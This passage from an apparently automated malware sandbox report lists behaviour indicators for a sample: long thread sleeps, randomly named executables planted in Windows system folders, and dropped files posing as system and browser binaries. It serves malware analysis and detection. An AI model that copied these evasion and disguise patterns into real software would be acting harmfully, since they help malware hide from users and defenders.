                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files\Everything\Everything.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 600000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 599734
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 599359
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 3600000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 599000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 598656
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 598312
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 598031
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 597609
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 597343
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 597078
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596924
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596760
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596484
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596261
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 595937
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 595234
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 595074
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594893
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 300000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594644
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594453
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594234
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594031
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593812
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593590
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593375
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593046
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 592796
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 592218
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591906
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591734
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591484
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591274
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590984
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590830
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590671
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590531
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590386
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590254
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590093
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589910
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589453
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589280
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589162
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589042
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588872
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588757
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588645
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588515
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588343
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588171
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588013
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587880
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587750
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587640
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587531
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587421
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587298
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587137
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586654
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586528
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586386
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586231
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586117
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585890
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585774
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585656
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585546
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585436
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585324
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585214
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585109
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584902
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584795
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584678
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584542
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584349
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583946
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583822
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583707
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583564
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583437
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583327
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583209
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583079
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582963
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582858
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582750
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582640
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582530
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582406
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582218
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582041
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 581828
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 581225
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580984
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580871
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580765
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580619
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580484
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1427
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1017
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1377
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1297
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1180
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1204
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1311
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1208
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1410
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1115
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1264
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1088
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1372
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1105
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1319
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1287
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1161
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1353
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWindow / User API: threadDelayed 6083
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWindow / User API: threadDelayed 3299
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeDropped PE file which has not been started: C:\Users\user\Desktop\fXnruzVd.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss476A.tmp\System.dllJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeDropped PE file which has not been started: C:\Users\user\Desktop\pGGHecbL.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\otdhyUEt.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeDropped PE file which has not been started: C:\Users\user\Desktop\GEAmOcnc.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeDropped PE file which has not been started: C:\Users\user\Desktop\TDoLDJFD.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeDropped PE file which has not been started: C:\Users\user\Desktop\utYFHYqz.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\ANcNpKUT.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\dFyrOIJL.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\phhpjhAr.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Uninstall.exeJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeDropped PE file which has not been started: C:\Users\user\Desktop\WteBKGGw.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\hwphVFJE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeDropped PE file which has not been started: C:\Program Files\Everything\Uninstall.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss476A.tmp\LangDLL.dllJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\qeIxFhOl.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss476A.tmp\InstallOptions.dllJump to dropped file
                                Source: C:\Program Files\Everything\Everything.exeEvasive API call chain: GetLocalTime,DecisionNodes
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_6-28528
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeAPI coverage: 5.7 %
                                Source: C:\Program Files\Everything\Everything.exeAPI coverage: 5.8 %
                                Source: C:\Program Files\Everything\Everything.exeAPI coverage: 6.9 %
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exe TID: 3148Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe TID: 5360Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep count: 1427 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8712Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 904Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8260Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep count: 1017 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8272Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 1377 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8732Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8252Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 1297 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8336Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 1180 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8656Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8388Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 1204 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8648Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep count: 1311 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8644Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8284Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 1208 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8664Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 1410 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8660Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8468Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep count: 1115 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 1264 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 1088 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8380Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep count: 1372 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8484Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 1105 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8716Thread sleep time: -18446744073709540s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8452Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep count: 1319 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8624Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep count: 1287 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8636Thread sleep time: -11990383647911201s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8456Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 1161 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8652Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8476Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep count: 1353 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8420Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files\Everything\Everything.exe TID: 8088Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8204Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -32281802128991695s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -600000s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -599734s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -599359s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8312Thread sleep time: -25200000s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -599000s >= -30000s
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe TID: 8244Thread sleep time: -598656s >= -30000s
